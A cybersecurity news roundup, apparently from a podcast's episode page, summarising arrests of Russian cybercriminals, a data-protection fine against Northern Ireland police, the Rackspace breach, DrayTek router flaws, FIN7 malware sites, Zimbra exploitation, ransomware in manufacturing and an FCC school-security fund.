Russian cybercriminal arrests, Irish police fined, Rackspace blame game
Subscribe to Cyber Security Headlines podcast
Spotify, Apple Podcasts , RSS link , add as an Alexa Skill , or search "Cyber Security Headlines" on your favorite podcast app.
In today’s cybersecurity news…
Russian authorities arrest nearly 100 cybercriminals in raid
On Wednesday, Russian authorities announced the arrests of 96 people related to an alleged cyber money laundering scheme that leveraged the UAPS payment system and Cryptex crypto exchanges. The announcement included a one-minute video showing authorities breaking down doors, making arrests, and counting large amounts of cash. The scheme netted its operators 3.7 billion rubles, the equivalent of roughly $39 million. The announcement comes less than a week after the U.S. authorities unsealed an indictment against two men allegedly connected to UAPS and seized Cryptex exchange domains.
(CyberScoop )
Northern Ireland police fined for exposing officer identities
The Police Service of Northern Ireland (PSNI) has been fined £750,000 ($1 million) after accidentally revealing the identities of the entirety of its 9,483 officers and staff. The data was exposed when the PSNI responded to a request under the Freedom of Information Act, and accidentlaly uploaded a document that included a human resources worksheet to a public portal. The file included surnames and first name initials, job role, rank, grade, department, location of post, contract type, gender and staff number. The fine comes from the United Kingdom’s data protection regulator, Information Commissioner’s Office (ICO), who oversees the Freedom of Information act. The ICO said the incident potentially exposes affected individuals to terrorist and criminal groups and “leaving many fearing for their safety.”
(The Record )
Rackspace breach sparks vendor blame game
Following up on the story we brought to you yesterday on Cyber Security Headlines , after the enterprise cloud host, Rackspace, was hacked on September 24, a vendor blame game has kicked off. Initially the Rackspace incident was attributed to a zero-day flaw in ScienceLogic’s SL1 monitoring app. However, ScienceLogic is now shifting the blame to an undocumented vulnerability in a different bundled third-party utility. While ScienceLogic declined to identify the responsible third-party, the company indicated that, upon identifying the flaw, they “rapidly developed a patch to remediate the incident and have made it available to all customers globally.” Attackers were able to pivot from the monitoring software to other internal Rackspace servers to compromise sensitive data of users who have now received breach notices.
(SecurityWeek )
Research reveals vulnerabilities in routers that left 700,000-plus exposed
On Wednesday, researchers at Forescout revealed 14 vulnerabilities that left more than 700,000 DrayTek routers exposed to the public internet. One vulnerability carried a 10.0 severity while another was rated 9.1 and the researchers said “these vulnerabilities could be used in espionage, data exfiltration, ransomware, and denial of service (DoS) attacks.” Further, 75% of vulnerable routers are used in commercial settings. More than half of the vulnerable routers (approximately 425,000) are in the European Union and United Kingdom, followed by Asia with just over 25% (190,000), with the remainder residing Australia and New Zealand (37,000), the Middle East (30,000), Latin America (15,000) and North America (7,200). Network admins are urged to apply patches as soon as possible.
领英推荐
(CyberScoop )
Huge thanks to our sponsor, SpyCloud
FIN7 spreads malware through deepfake nude “generator” sites
FIN7 is believed to have Russian ties and has carried out sophisticated phishing and social engineering attacks since 2013. Researchers spotted FIN7 websites masquerading as AI powered deepnude generators. The sites allow users to upload photos, however, after the alleged “deepnude” photo is generated the user is prompted to click a link to download the updated image. Instead of receiving a new image, Lumma Stealer malware infects the user’s device to steal credentials and cookies saved in web browsers, cryptocurrency wallets, and other data. All seven sites detected have since been taken down, but users who might have downloaded files from them should consider themselves infected.
Zimbra bug causes alarm after mass exploitation attempts
Multiple cybersecurity agencies in Europe warned about a vulnerability in Zimbra’s email product. Zimbra is a widely used email platform that is a frequent target for both nation-states and cyber criminals. Researchers at Proofpoint said they began seeing exploitation of the latest Zimbra bug (CVE-2024-45519) on September 28. Attackers sent emails spoofing Gmail “sent to bogus addresses in the CC fields in an attempt for Zimbra servers to parse and execute them as commands.” Compromised servers were then observed being used to host additional malware. Zimbra has released a patch as several other experts say they are seeing mass targeting of the bug.?
(The Record )
Manufacturers rank as ransomware’s biggest target
According to a study from Black Kite, the manufacturing sector is over three times more likely to suffer a ransomware attack and account for 21% of all ransomware incidents. Out of the 5,000 companies that were examined, 80% of manufacturing companies have “critical” CVSS-rated vulnerabilities, 67% of which are listed in the Known Exploited Vulnerabilities (KEV) catalog maintained by the Cybersecurity and Infrastructure Agency (CISA). The researchers said threat actors are aware of the weak links posed by manufacturers and that “these companies play critical roles within global supply chains.” The researchers said that manufacturers should focus on patch management for internet facing assets, addressing exposed credentials, and better securing their web applications.
(Dark Reading )
FCC offering $200 million to protect schools and libraries from hackers
The Federal Communications Commission is offering up to $200 million through the Schools and Libraries Cybersecurity Pilot Program. K-12 schools and libraries will be able to reimburse things like advanced firewalls, identity protection and authentication services, malware protection, and VPNs. The FCC says it expects to open the application process this fall and will select a mix of schools with added emphasis placed on funding projects from low-income and Tribal applicants. The pilot program will be used to evaluate whether to fund this kind of program on a more permanent basis.?
(The Verge )